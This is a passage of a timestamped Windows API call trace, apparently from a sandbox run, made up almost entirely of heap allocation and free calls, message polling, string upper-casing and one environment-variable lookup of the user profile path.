hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0256.525] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0256.525] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0256.525] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0256.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1768 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0256.526] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.526] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.527] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24b3190 [0256.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1838 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.528] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0256.529] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa7a0 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.529] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.529] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0256.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0256.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.530] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1748 [0256.530] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0256.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2de8 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0256.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acde0 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0256.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0256.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0256.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0256.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0256.532] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.533] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0256.533] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0256.533] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0256.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0256.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0256.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0256.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0256.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.535] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0256.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0256.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0256.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0256.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0256.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0256.537] PeekMessageW 